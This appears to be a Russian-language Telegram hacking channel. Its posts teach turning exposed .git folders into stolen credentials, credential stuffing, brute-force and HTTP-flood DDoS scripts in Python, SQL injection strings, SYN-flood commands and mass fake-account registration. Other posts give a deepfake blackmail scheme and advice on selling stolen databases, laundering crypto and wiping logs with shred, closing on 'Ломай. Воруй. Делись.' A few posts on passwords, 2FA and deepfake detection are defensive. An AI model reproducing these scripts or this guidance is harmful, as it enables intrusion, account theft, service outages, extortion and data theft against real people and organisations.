кодинг с шансом
48 subscribers
1 photo
6 files
19 links
учимся вместе с шансом!

• полезные советы
• полезные софты/программы
• и много всего интересного
Download Telegram
Всех приветствую! сегодня мы разберем: как через .git вытащить то, что забыли спрятать

Все говорят про безопасность, но половина проектов лежит с открытым .git на продакшене. Сегодня покажу, как превратить эту ошибку в свой козырь.


Используем простой поиск в Google или нетривиальный waybackurls + gau:
waybackurls target.com | grep -E "\.git/" | uniq
Цель — найти https://target.com/.git/.

Шаг 2: Забор
Если доступ есть, качаем всё. Берем git-dumper:
python3 git_dumper.py https://target.com/.git/ ./output-dir
Инструмент вытянет всю историю, даже если доступ частичный.

Шаг 3: Анализ и извлечение
Переходим в папку и смотрим логи:
git log --oneline
Ищем коммиты с говорящими названиями вроде "hotfix pass", "remove credentials", "add config".
Затем просматриваем изменения в конкретном коммите:
git show <commit-hash>
Часто в старых коммитах лежат пароли от БД, API-ключи cloud-сервисов или даже приватные SSH-ключи, которые "удалили", но они навсегда в истории.

Шаг 4: Что делать с этим?

· Ключи от облака (AWS, DigitalOcean): Проверяем на доступность. Часто ключи живут долго.
· Пароли БД: Пробуем подключиться не только к основной БД проекта, но и к внутренним сервисам компании.
· Исходники: Ищем уязвимости в самом коде, которые не попали в продакшен. Логики бэкдоров, скрытые эндпоинты.
Реальный кейс:
Однажды в истории нашли старый файл конфига с паролем от внутренней VPN. Этот пароль оказался тем же, что и для корпоративной почты админа. Дальше — дело техники.


Инструменты:

· git-dumper
· truffleHog (для автоматического поиска секретов в гите)
· Gitleaks

Вывод:
.git на продакшене — это не ошибка, это подарок. Всегда проверяйте. Всегда используйте.

Следующий раз — разберём, фишки Windows


кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
3
Фишки Windows для исследований и оптимизации

Эти инструменты — не просто удобства. Это рычаги для тех, кто работает без ограничений. Я вам покажу такое что мало где рассказывают


Читать статью - клик

в следующий раз мы разберем как делаются боты и их основу

кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
1
Гайд по созданию ботов: инструменты и автоматизация

Хочешь автоматизировать рутину или создать сеть для задач? Боты — твой инструмент. Вот суть.

ВЫБОР ЯЗЫКА И БИБЛИОТЕК

Python — лучший старт. Библиотеки:

· requests/aiohttp — отправка HTTP-запросов (основа любого бота).
· BeautifulSoup4/lxml — парсинг HTML (вытащить данные из страницы).
· selenium/playwright — управление реальным браузером (если сайт на сложном JavaScript).
· pyautogui — автоматизация действий мыши/клавиатуры (для десктопных программ).
· telebot/aiogram — создание Telegram-ботов.
· socket — для низкоуровневых сетевых ботов (например, для подключения к игровым серверам).



ЧТО МОЖНО АВТОМАТИЗИРОВАТЬ?

1. Парсинг данных (цены, новости, контакты)


   # Пример: парсим заголовки с сайта
import requests
from bs4 import BeautifulSoup

response = requests.get('https://example.com')
soup = BeautifulSoup(response.text, 'html.parser')
titles = soup.find_all('h2') # Ищем все заголовки
for title in titles:
print(title.text)

2. Автопостинг в соцсети/мессенджеры:
· Через API (Telegram Bot API, VK API) или эмуляцию действий через selenium.

3. Мониторинг изменений (наличие товара, изменение цены):
· Бот периодически проверяет страницу и при изменении отправляет уведомление.

4. Автозаполнение форм, отправка сообщений.

5. Торговые/игровые боты (взаимодействие через API или эмуляцию кликов).


КАК ОБХОДИТЬ ЗАЩИТУ?

Сайты блокируют ботов. Вот как быть на шаг впереди:

1. Прокси и VPN: Меняй IP-адреса. Используй ротацию прокси.
2. Реальные заголовки (headers): Включай User-Agent, Accept-Language, другие заголовки как у браузера.
3. Задержки: time.sleep(random.uniform(2, 5)) между действиями.
4. Куки и сессии: Сохраняй сессию через requests.Session().
5. Капча: Сервисы anti-captcha (платно) или обучение своей модели (сложно).


ПРИМЕР: БОТ-МОНИТОР ДЛЯ САЙТА

import requests
import time
import hashlib

last_content_hash = None # Хеш предыдущего содержимого

while True:
response = requests.get('https://target-site.com/stock')
current_hash = hashlib.md5(response.content).hexdigest() # Считаем хеш страницы

if last_content_hash and current_hash != last_content_hash:
print("[!] Страница изменилась! Отправляем сигнал.")
# Тут можно отправить сообщение в Telegram или email
# Например, через telebot или smtplib

last_content_hash = current_hash
time.sleep(60) # Проверяем каждую минуту

СЛЕДУЮЩИЙ УРОВЕНЬ

· Асинхронность: asyncio + aiohttp для одновременной работы сотен ботов.
· Распределение: Запуск ботов на разных серверах/VPS.
· Скрытность: Эмуляция человеческого поведения (случайные скроллы, движения мыши через selenium).
· Панель управления: Веб-интерфейс для управления ботами (Flask/Django).

Итог: Основа бота — эмуляция человеческих действий с защитой от обнаружения. Начни с простого парсера, добавь прокси и случайные задержки, затем масштабируй.
Так же хочу дать важный совет начинающим, не бойтесь гуглить если что-то не понимаете в этом нет ничего постыдного.

в следующий раз разберем как Vзл@мыв@ют аккаунты, сайты и базы данных приложений

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
1
Как на самом деле взламывают аккаунты, сайты и базы данных?

Забудь про хакеров в капюшонах из фильмов. Всё проще, грязнее и часто банальнее. Вот реальные методы, которые работают прямо сейчас.

1. Взлом аккаунтов: не пароль, а человеческий фактор

· Фишинг (90% успеха): Не нужно ломать. Нужно попросить. Тебе приходит письмо «Ваш аккаунт заблокирован» или сообщение от «друга» с ссылкой на «новый стикерпак». Ссылка ведёт на точную копию страницы входа в ВК, Steam, банк. Ты вводишь логин и пароль — они уже у злоумышленника. Всё. Пароль может быть хоть 50 символов.
· SIM-своппинг: Звонок в салон мобильного оператора от имени «владельца», социальная инженерия, получение дубликата сим-карты. Все смс-коды двухфакторной аутентификации теперь приходят нашедшему. Банковские приложения падают за час.
· Перебор по утечкам (Credential Stuffing): Берут логин и пароль из старой утечки (допустим, от какого-нибудь старого форума). Пробуют эту же связку на Gmail, Steam, Amazon. Люди используют одни и те же пароли везде — это золотая жила.

Практический пример (ТОЛЬКО ДЛЯ ПОНИМАНИЯ):
Скрипт на Python для Credential Stuffing может выглядеть так (упрощённо):

import requests
# Допустим, у нас есть список login:password из утечки
for creds in stolen_credentials_list:
login, password = creds.split(':')
# Пытаемся автоматически авторизоваться на целевом сайте
session = requests.Session()
response = session.post('https://target-site.com/login', data={'login': login, 'password': password})
if 'Добро пожаловать' in response.text:
print(f'НАЙДЕНО! {login}:{password}')
break

Работает, если на сайте нет капчи или лимита попыток.

2. Взлом сайтов: эксплуатация дыр, а не магия

· SQL-инъекция (SQLi): Классика, которая до сих пор убивает. Если форма ввода на сайте (поиск, логин) плохо написана, в неё можно ввести не данные, а кусок команды для базы данных.
· Ввод в поле логина: ' OR '1'='1' --
· Что делает: Команда OR '1'='1' всегда истинна, -- комментирует остаток запроса. Можно обойти авторизацию или вытащить всю базу данных: имена, email, хеши паролей.
· Инъекция на стороне сервера (RCE): Если очень повезёт, через уязвимые параметры можно передать команду напрямую серверу. Например, ; rm -rf / или загрузить веб-шелл (файл, дающий полный контроль через браузер).

3. Взлом баз данных приложений: кража «сливков»

Чаще всего БД не «взламывают» отдельно. К ним получают доступ через:

1. Уязвимость в самом приложении (как SQLi выше).

2. Конфигурационные ошибки: База данных (например, MongoDB, Redis) вынесена в интернет без пароля. Её находят сканеры портов за пару часов и забирают всё.

3. Взлом сервера: Через уязвимость в панели управления, старом ПО на сервере или того же сотрудника (фишинг). Получив права администратора на машине, доступ к БД — дело техники.

Итог: Основные враги безопасности — лень (не обновлять софт), глупость (кликать на ссылки) и повторение паролей. Защита строится не на секретности, а на правильных привычках и грамотной настройке систем. Но большинство предпочитает рисковать, пока их данные не окажутся в открытом доступе на каком-нибудь даркнет-форуме.

в следующий раз разберем как ломают интернет в данное время (дд0с)


кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
1
dd0s: как ломают интернет сейчас?

Забудь про старые атаки с ПК. Сейчас это индустрия.

1. МОЩЬ: ОТКУДА БЕРЕТСЯ ТРАФИК?

· Армии вещей: Умные камеры, роутеры, телевизоры. Миллионы уязвимых устройств, из которых строят ботнеты (тип Mirai).
· Усиление (Amplification): Главный хак. Атакующий шлет маленький запрос на открытый сервер (DNS, NTP, Memcached), подделав IP жертвы. Сервер в ответ шлет жертве гигантский поток данных. Усиление в сотни раз.
· Слои:
· L3/L4 (канал): Забивают канал мусором (UDP/ICMP-флуд).
· L7 (приложение): Точечно бьют по сайту. Боты ведут себя как люди, но в тысячи раз быстрее. Ломают логику, а не канал.

2. КТЕХНИКАМ (ТОЛЬКО ДЛЯ ЛАБЫ):

· Проверка уязвимости NTP: ntpdc -c monlist [IP_NTP_СЕРВЕРА] (если ответит списком — бинго).
· Синтетика в лаборатории: hping3 -S --flood --rand-source -p 80 [ЦЕЛЬ] (SYN-флуд).

3. ЗАЩИТА (ОБРАТНАЯ СТОРОНА):

· Фильтрация на границе (BGP Flowspec, ACL).
· Любой ценой закрыть на своих серверах UDP-сервисы, не нужные миру (Memcached, NTP monlist, SSDP).
· CDN/прокси (Cloudflare и аналоги): Спрятать реальный IP, фильтровать ботов.
· Rate-limiting и поведенческий анализ для Layer 7.

СУТЬ: Современный dd0s — это арендуемая мощь уязвимой инфраструктуры всего интернета. Защита — это постоянная гонка и глубокая настройка.


В следующий раз разберем как нейросети создают неотличимую ложь и как этим уже сегодня шантажируют людей

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Глубокие фейки: как нейросети создают неотличимую ложь и как этим уже сегодня шантажируют людей

Забудь про плохие мемы с лицами знаменитостей. Современные deepfake — это оружие. Они могут заставить любого сказать что угодно, сделать что угодно на видео. И для этого не нужна лаборатория ЦРУ. Нужен мощный ноутбук, гигабайты исходников из Instagram и немного терпения.

Часть 1: Как это работает (без скучной теории)

В основе — нейросети-«соперники» (GAN). Одна — генератор — создаёт подделку. Вторая — дискриминатор — пытается её уличить. Они дерутся миллионы циклов, пока генератор не начнёт побеждать. Результат — видео, где ты говоришь то, чего никогда не говорил.

Практический фрагмент (технологический стек):

Для работы тебе понадобится:

1. Исходники: 5-10 минут качественного видео цели (хорошее освещение, разные ракурсы). Берутся из Stories, прямых эфиров, публичных выступлений.
2. Софт: DeepFaceLab (наиболее мощный) или ROOP (для быстрых однокадровых замен). Софт открытый, лежит на GitHub.
3. Железо: Видеокарта NVIDIA (от 8 ГБ памяти), лучше RTX 3090/4090. На CPU рендерить можно, но это дни, а не часы.

Упрощённая последовательность команд в DeepFaceLab:

# 1. Извлечь кадры из видео цели и донора (того, чьё лицо подставляем)
python faceset extract
# 2. Обучить модель на датасете (самый долгий этап, может идти сутки)
python train — это командная строка
# 3. Наложить обученное лицо на исходное видео
python merge
# 4. Собрать финальное видео со звуком
python videoed

Всё. Никакого сложного кода писать не нужно. Интерфейс — набор bat-файлов. Главное — правильно собрать датасет и долго тренировать.

Часть 2: От развлечения к шантажу. Реальные схемы

Здесь начинается тёмная сторона. Алгоритм действий для злоумышленника:

1. Выбор цели: Не звезда, а обычный человек с положением: бухгалтер фирмы, чиновник среднего звена, менеджер с доступом к финансам.

2. Сбор материала: Видеозвонки с коллегами, корпоративные ролики, даже Zoom-конференции, где
цель попала в кадр.

3. Создание компромата: Генерация видео, где «цель» в кадре признаётся в растрате, обсуждает взятку, или ведёт себя непристойно. Звук генерируется отдельно (технологии вроде VALL-E или ElevenLabs).

4. Атака: Видео отправляется жертве с требованием выкупа в биткоинах. Угроза — отправить ролик руководству, семье, в СМИ. Часто выкладывают короткий тизер как доказательство.

5. Давление: Большинство жертв платят. Они не могут доказать, что это фейк, а на экспертизу нет времени или денег. Паника делает своё дело.

Часть 3: Как обнаружить подделку (если очень внимательно)

Идеальных фейков нет. Ищи артефакты:

· Глаза: Неестественное моргание или отсутствие отблесков (light reflections) в радужке.
· Волосы и контуры: Размытые края прически, «плывущий» контур лица на фоне сложного фона.
· Микродвижения: Несинхронность движений головы и мимики.
· Зубы: Слишком идеальные, или неестественная текстура при улыбке.
· Метаданные видео: Даты создания, редактирования, инструменты — всё можно проверить.

Но помни: качество растёт экспоненциально. Через год этих артефактов может не остаться.

вывод:
Технология перестала быть игрушкой. Она стала товаром на тёмных форумах. Услуга «подставлю лицо на любое видео» стоит от 50$. Это оружие массового поражения репутации. Защиты нет — только тотальный контроль над своим цифровым следом. Но если ты уже попал в объектив, то единственный способ бороться с шантажом — не платить. Потому что после первой выплаты последует вторая. И третья. А фейк навсегда останется в сети.

скоро разберем следующую очень интересную тему, которую многие так боятся

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Тебе написала школота с угрозами д0кс@? Это твой козырь.

Тебе кинули в личку твой адрес или данные паспорта. Паника? Зря. Ты только что выиграл. Потому что теперь у тебя есть все карты, чтобы уничтожить того, кто это сделал.

Главная ошибка доксера — он выходит на контакт. Он угрожает. Он требует. И с этого момента он перестаёт быть анонимным призраком. Он становится мишенью. Если он просит откуп (кинуть ему бабла) то смело вживайся в роль и проси реквизиты для перевода, это можео сильно сыграть на руку

Скрины угроз — твоё абсолютное оружие. Не удаляй, не блокируй. Сохраняй ВСЁ: его аккаунт, аватар, каждое сообщение, каждый файл. Это не доказательства против тебя. Это доказательства ПРОТИВ НЕГО.

Твой ответ должен быть одним:

«Все угрозы и твои контакты зафиксированы. Следующее сообщение — автоматическая рассылка в Управление «К» МВД (киберпреступления), твоим родителям (я их уже нашёл) и на работу. Выбирай: исчезаешь сейчас или проверяем, кто реально пострадает».

Почему это работает на 100%?

1. Он не хакер. Он нашёл твои старые данные в шерл0ке. Он — обычный школьник или обиженка. Его сила только в твоём страхе.
2. Угрозы по УК РФ — это статьи 119, 137, 163. Твои скрины — прямое доказательство для возбуждения дела. Полиция найдёт его по IP и привязанному к Telegram паспорту.
3. Ему есть что терять. У него есть реальная жизнь: родители, работа, репутация. А у тебя есть скрины, которые могут его уничтожить.

Д0кс — это не атака на тебя. Это предложение сыграть в игру, где правила написал ты. Он показал свою слабость, выйдя из тени. А ты получил рычаг давления на всю его жизнь.

Вывод: не бойся. Записывай. Грози ответкой. И наблюдай, как он сам всё удалит и извинится. Страх — его оружие. А твоё оружие — готовность ударить в десять раз сильнее по его реальному существованию. У теперь есть доказательства. Используй их.

Так же не забываем про кибербезопастность (о ней напишу в следующем посте)

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Кибербезопасность, которая работает. Не теория, а железные правила!

Забудь про сложные термины. Безопасность в сети сводится к простым действиям, которые делают тебя «несъедобным» для 99% атак.

1. Пароли — твоя главная дыра.

· Правило: Один пароль — один сервис.
· Как: Используй менеджер паролей (KeePass, Bitwarden). Он сгенерирует и запомнит за тебя сложные комбинации. Главный мастер-пароль должен быть уникальным и длинным (фраза). Больше ничего запоминать не нужно.

2. Двухфакторная аутентификация (2FA) — твой щит.

· Что: Вход требует не только пароль, но и одноразовый код.
· Как: ВКЛЮЧИ везде, где есть. Используй не смс, а приложение-аутентификатор (Google Authenticator, Aegis). Это убивает SIM-своппинг.

3. Обновления — не просто так.

· Почему: 80% атак используют известные дыры, для которых патч вышел год назад. Обновляй ОС, браузер и всё важное ПО. Включи автообновления.

4. Фишинг — ловят всех. Будь параноиком.

· Правило: Не кликай на ссылки в письмах и сообщениях.
· Как: Всегда заходи на сайты вручную через браузер. Проверяй адресную строку:
g00gle.com — это не Google. Внимание на орфографию.

5. Резервные копии — последняя линия обороны.

· Что: Если всё сломается или тебя зашифруют, только бэкап спасёт.
· Как: Правило 3-2-1. 3 копии данных, на 2 разных носителях, 1 из которых в другом месте (облако, другой город).

6. Цифровая гигиена — меньше следов.

· Что: Не выкладывай в открытый доступ то, что может скомпрометировать: фото документов, дома с геометками, рабочие переписки.
· Как: Проверь, что видят о тебе незнакомцы в соцсетях. Закрой профиль, убери лишнюю информацию.

Итог:
Не нужно быть экспертом. Нужно быть дисциплинированным. Включи 2FA, поставь менеджер паролей, обновляй софт и не верь слепо ссылкам. Эти четыре действия поставят тебя выше большинства пользователей. Безопасность — это не паника, это привычка. Выработай её.

следующий пост будет о том что скрывают обучения за 100$+.

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Обучение взлому: что скрывают курсы за 100 тысяч рублей

Если ты ждешь инструкцию «как взломать ВК за 5 минут», закрой статью. Реальный взлом — это не кнопка. Это скучное, долгое ремесло. Вот из чего на самом деле состоит «обучение».

Фундамент: то, без чего ты ноль

1. Сети: Как движутся пакеты. TCP/IP, DNS, HTTP/S, прокси. Без этого ты слепой.
2. Операционные системы (Linux): Командная строка — твой главный инструмент. Умение жить в терминале Kali или Parrot OS.
3. Языки: Не нужно знать десять. Нужно понимать:
· Python/Bash — для автоматизации скучной работы (перебор, сканирование).
· SQL — чтобы понимать, как ломаются базы данных.
· Основы HTML/JS — чтобы видеть дыры в вебе.

Полигон: где режут кошек
Тебе нужна легальная среда, где можно бить, не попадая под статью.

· Хакатоны и CTF (Capture The Flag): Игровые площадки с задачами на поиск уязвимостей. Примеры: HackTheBox, TryHackMe, OverTheWire.
· Лаборатории: Виртуальные машины с преднамеренно уязвимым софтом (Metasploitable, DVWA).

Методология: не атака, а процесс
Настоящий взлом — это алгоритм, повторяемый раз за разом:

1. Разведка (Reconnaissance): Сбор информации о цели. Открытые порты, запущенные службы, версии ПО.
2. Сканирование уязвимостей: Автоматизированный поиск известных дыр в найденном софте (Nessus, OpenVAS).
3. Получение доступа (Exploitation): Использование уязвимости для запуска своего кода. Это тот самый «взлом».
4. Закрепление (Persistence): Обеспечение возврата в систему, даже если её перезагрузят.
5. Сокрытие следов (Covering Tracks): Очистка логов.

Правда, которую не расскажут:

· 90% успеха — скучная автоматизация. Написание скрипта, который переберёт 1000 комбинаций, важнее «гениальной догадки».
· Главный враг — время. На поиск одной уязвимости у профессионалов уходят недели.
· Это легально, пока ты атакуешь свои полигоны или получаешь письменное разрешение (Bug Bounty). Один неверный шаг в реальную систему — и ст. 272 УК РФ становится твоей спутницей.

Вывод:
Обучение взлому — это не про «взломать». Это про понимание, как что-то устроено, чтобы найти в этом слабое место. Это про усидчивость, а не про крутой взлом. Начни с основ сетей и командной строки. Всё остальное — лишь инструменты в руках того, кто знает фундамент.


Запомни, если решаешь делать что-то незаконное то помни "от правительства не скрыватся всегда, рано или поздно найдут"

В следующем посте будет интересное обучение

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
БЫСТРЫЙ СТАРТ В ТЕМНЫЙ КОДИНГ

1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:

· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.

2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ

· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.

3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)

· Telegram:
@blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums,
XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.

4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)

import requests
import threading

target_url = "http://target.com/login"
usernames = ["admin", "user", "root"]
passwords = ["123456", "password", "admin"]

def brute(user, pwd):
data = {"login": user, "password": pwd}
r = requests.post(target_url, data=data)
if "error" not in r.text.lower():
print(f"[+] ВЗЛОМАНО: {user}:{pwd}")
with open("hacked.txt", "a") as f:
f.write(f"{user}:{pwd}\n")

for u in usernames:
for p in passwords:
threading.Thread(target=brute, args=(u, p)).start()

5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД

· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.

6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)

· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.

7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)

· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*

8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.

СТАРТУЙ СЕЙЧАС:

1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (
hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).

ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.

в следующем посте будет небольшая статья о том как правильно и безопастно писать софты

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Чёрный софт: дд0s, автоматизация атак и поиск утечек

ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!

1. дд0s-СОФТ (ПРИНЦИП)

Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.

Код-скелет на Python (HTTP-flood):

import threading
import requests

target_url = "http://target.com"
threads = 500

def attack():
while True:
try:
requests.get(target_url, timeout=3)
except:
pass

for i in range(threads):
thread = threading.Thread(target=attack)
thread.daemon = True
thread.start()

while True: pass # Бесконечная атака

Усложнение или же для вашего блага:

· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)

Готовые решения (в д@рkнeтe):

· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)

2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ

Концепция: Имитация человека для массовых операций.

Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):

from selenium import webdriver
import random, string

def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "
@gmail.com"

driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("
https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:

· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)

3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ

Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.

Ключевые методы:

А. Мониторинг даркнет-форумов и чатов (Telegram-бот):

import telethon, re, sqlite3

client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')

@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):

import requests, re

sites = ["
pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):

import hashlib, re

def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data =
f.read()

# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))

# Проверка своих данных в утечке
my_creds = ["
my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:

· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
·
Intelx.io (поиск по индексам)

Технические фишки:

1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа
@leakbase, @databreach.

ЗАЩИТА:

· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
Итог: Такой софт — просто автоматизация рутинных действий. Реальная опасность — в масштабе, который он позволяет достичь: тысячи атак в минуту, мониторинг сотен источников утечек одновременно. Защита должна быть такой же автоматизированной.

в следующей статью напишу как на самом деле сливают бд

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Как на самом деле сливают базы данных?
от SQL-инъекции до внутренней утечки

Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.

1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)

· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно

2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ

А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.

' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.

Б. Открытые порты и пароли по умолчанию:

· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.

В. Уязвимости в ПО:

· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.

3. АТАКИ НА БЭКАПЫ

· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql,
dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.

4. ФИШИНГ ДЛЯ АДМИНОВ

1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.

5. ПРОДАЖА "ИЗНУТРИ"

Схема работы на теневом форуме:

[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):

1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.

Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.

в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
CSINT с нуля: как научиться киберразведке

че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.

1. БАЗА: БЕЗ НЕЁ НИКУДА

· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.

2. ИНСТРУМЕНТАРИЙ

Пассивная разведка:

·
Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
·
Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.

Активные методы (осторожно, могут оставлять следы):

· Nmap — сканирование портов. Базовый скрипт:

  nmap -sV -O -p 1-1000 target.com

· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).

3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)

Где искать:

· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)

Как анализировать:

1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.

Пример команды для анализа дампа:

# Поиск всех записей с доменом gmail.com
grep -i "@gmail.com" leaked_dump.txt | head -20

# Поиск конкретного логина
grep "username123" leaked_dump.txt

# Извлечение только паролей
awk -F: '{print $2}' leaked_dump.txt | sort | uniq

4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ

Инструменты:

· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.

Что можно найти:

· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО

5. АВТОМАТИЗАЦИЯ НА PYTHON

Скрипт мониторинга новых утечек в Telegram:

from telethon import TelegramClient, events

api_id = YOUR_ID
api_hash = 'YOUR_HASH'
client = TelegramClient('session', api_id, api_hash)

@client.on(events.NewMessage(chats=('leakbase')))
async def handler(event):
if 'dump' in event.message.text.lower():
print(f'Новая утечка: {event.message.text}')
# Автосохранение или парсинг

client.start()
